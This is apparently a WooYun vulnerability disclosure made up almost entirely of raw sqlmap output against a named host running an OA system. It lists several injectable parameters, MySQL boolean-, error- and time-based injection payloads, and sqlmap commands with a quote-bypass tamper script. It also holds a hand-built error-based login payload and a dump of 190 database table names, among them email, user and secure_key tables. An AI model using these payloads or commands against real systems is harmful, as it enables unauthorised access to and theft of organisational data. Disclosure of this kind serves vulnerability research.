WooYun.org

http://jira.bltech.cn/general/score/flow/scoredate/result.php?FLOW_ID=%bf%27%20

sqlmap identified the following injection point(s) with a total of 308 HTTP(s) r
equests:
---
Parameter: FLOW_ID (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: FLOW_ID=-1617' OR 5277=5277#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: FLOW_ID=' AND (SELECT 9301 FROM(SELECT COUNT(*),CONCAT(0x7176786a71
,(SELECT (ELT(9301=9301,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SC
HEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: FLOW_ID=' AND (SELECT * FROM (SELECT(SLEEP(5)))gmaf)
---
[00:27:05] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[00:27:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.11
back-end DBMS: MySQL 5.0

sqlmap.py -u "http://jira.bltech.cn/general/score/flow/scoredate/result.php?FLOW_ID=" --tamper unmagicquotes.py

http://jira.bltech.cn/interface/auth.php?&PASSWORD=1&USER_ID=

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: USER_ID (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: &PASSWORD=1&USER_ID=%df'  AND (SELECT 5019 FROM(SELECT COUNT(*),CON
CAT(0x7171627671,(SELECT (ELT(5019=5019,1))),0x716b717a71,FLOOR(RAND(0)*2))x FRO
M INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- KDYR
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: &PASSWORD=1&USER_ID=%df'  RLIKE SLEEP(5)-- uKGP
---
[00:28:39] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[00:28:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.11
back-end DBMS: MySQL 5.0

sqlmap.py -u "http://jira.bltech.cn/interface/auth.php?&PASSWORD=1&USER_ID=" --tamper unmagicquotes.py

http://jira.bltech.cn/module/sel_seal/get.php?ID=

sqlmap identified the following injection point(s) with a total of 1334 HTTP(s)
requests:
---
Parameter: ID (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: ID=' AND (SELECT 9615 FROM(SELECT COUNT(*),CONCAT(0x716b716271,(SEL
ECT (ELT(9615=9615,1))),0x7170717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
CHARACTER_SETS GROUP BY x)a)
---
[00:40:06] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[00:40:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.11
back-end DBMS: MySQL 5.0

sqlmap.py -u "http://jira.bltech.cn/module/sel_seal/get.php?ID=" --tamper unmagicquotes.py

http://jira.bltech.cn/ispirit/logincheck.php?USEING_KEY=2&USERNAME=sea%df%27%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x3a,(MID((IFNULL(CAST(USER()%20AS%20CHAR),0x20)),1,50)),0x3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)--%20sea

Database: td_oa
[190 tables]
+----------------------+
| user                 |
| version              |
| address              |
| address_group        |
| affair               |
| app_config           |
| app_log              |
| attachment_edit      |
| attend_config        |
| attend_duty          |
| attend_evection      |
| attend_holiday       |
| attend_leave         |
| attend_manager       |
| attend_out           |
| bbs_board            |
| bbs_comment          |
| book_info            |
| book_manage          |
| book_manager         |
| book_type            |
| bs_line              |
| calendar             |
| categories_type      |
| censor_data          |
| censor_module        |
| censor_words         |
| chatroom             |
| contact              |
| contract             |
| contract_line        |
| countdown            |
| cp_asset_type        |
| cp_assetcfg          |
| cp_cptl_info         |
| cp_dpct_sub          |
| cp_prcs_prop         |
| customer             |
| department           |
| dept_map             |
| diary                |
| diary_comment        |
| diary_comment_reply  |
| efax_account         |
| efax_receive_box     |
| efax_send_box        |
| email                |
| email_body           |
| email_box            |
| exam_data            |
| exam_flow            |
| exam_paper           |
| exam_quiz            |
| exam_quiz_set        |
| ext_user             |
| field_date           |
| fieldsetting         |
| file_content         |
| file_sort            |
| flow_form_type       |
| flow_print_tpl       |
| flow_process         |
| flow_query_tpl       |
| flow_rule            |
| flow_run             |
| flow_run_data        |
| flow_run_feedback    |
| flow_run_log         |
| flow_run_prcs        |
| flow_sort            |
| flow_timer           |
| flow_type            |
| hrms                 |
| icqcontact_tb        |
| icqmsgs_tb           |
| icqservermsg_tb      |
| interface            |
| ip_rule              |
| linkman              |
| meeting              |
| meeting_equipment    |
| meeting_room         |
| module_priv          |
| mytable              |
| netchat              |
| netdisk              |
| netmeeting           |
| news                 |
| news_comment         |
| notes                |
| notify               |
| oa_source            |
| oa_source_used       |
| oc_log               |
| office_products      |
| office_task          |
| office_transhistory  |
| order_line           |
| picture              |
| plan_type            |
| product              |
| proj_bug             |
| proj_comment         |
| proj_cost            |
| proj_file            |
| proj_file_log        |
| proj_file_sort       |
| proj_forum           |
| proj_priv            |
| proj_project         |
| proj_task            |
| proj_task_log        |
| provider             |
| provider_linkman     |
| rms_file             |
| rms_lend             |
| rms_roll             |
| rms_roll_room        |
| rsa_keypair          |
| sal_data             |
| sal_flow             |
| sal_item             |
| sale_history         |
| sale_manager         |
| score_date           |
| score_flow           |
| score_group          |
| score_item           |
| seal                 |
| seal_keylic          |
| seal_log             |
| secure_key           |
| service              |
| sms                  |
| sms2                 |
| sms2_priv            |
| sms3                 |
| sms_body             |
| supply_history       |
| supply_order         |
| sys_code             |
| sys_function         |
| sys_log              |
| sys_menu             |
| sys_para             |
| task                 |
| train_apply          |
| train_appoint_muster |
| train_assess_data    |
| train_assess_item    |
| train_assess_title   |
| train_courses        |
| train_ctype          |
| train_info           |
| train_mail           |
| train_manager        |
| train_newcourse      |
| train_survey_data    |
| train_survey_item    |
| train_survey_title   |
| train_teachers       |
| train_ttype          |
| uni1                 |
| unit                 |
| url                  |
| user_group           |
| user_map             |
| user_online          |
| user_priv            |
| vehicle              |
| vehicle_maintenance  |
| vehicle_operator     |
| vehicle_usage        |
| versio1              |
| vi_flow_run          |
| vi_user              |
| vote_data            |
| vote_item            |
| vote_title           |
| webmail              |
| wiki_ask             |
| wiki_ask_answer      |
| wiki_comment         |
| wiki_info            |
| winexe               |
| word_model           |
| work_detail          |
| work_person          |
| work_plan            |
| zl_file              |
+----------------------+